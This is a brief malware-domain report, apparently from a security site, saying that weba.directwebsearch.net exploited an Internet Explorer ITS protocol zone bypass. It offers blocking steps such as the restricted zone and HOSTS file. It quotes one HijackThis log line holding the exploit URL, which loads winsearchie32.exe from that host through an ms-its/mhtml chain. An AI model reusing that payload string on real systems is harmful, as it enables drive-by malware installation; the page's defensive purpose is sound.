Skip to content

weba.directwebsearch.net

submitted by Roger Karlsson

weba.directwebsearch.net seems to have been exploiting the Microsoft Internet Explorer ITS Protocol Zone Bypass Vulnerability, based on the following Hijackthis log:

O16 - DPF: {11010101-1001-1111-1000-110112345678} - ms-its:mhtml:file://c:\nosuch.mht!http://weba.directwebsearch.net/winsearchie32.chm::/winsearchie32.exe

Koffix offers you the possibility to:

  1. add weba.directwebsearch.net to the restricted zone
  2. add weba.directwebsearch.net to the HOSTS file

The information about weba.directwebsearch.net is licensed under Creative Commons Attribution 2.5 License.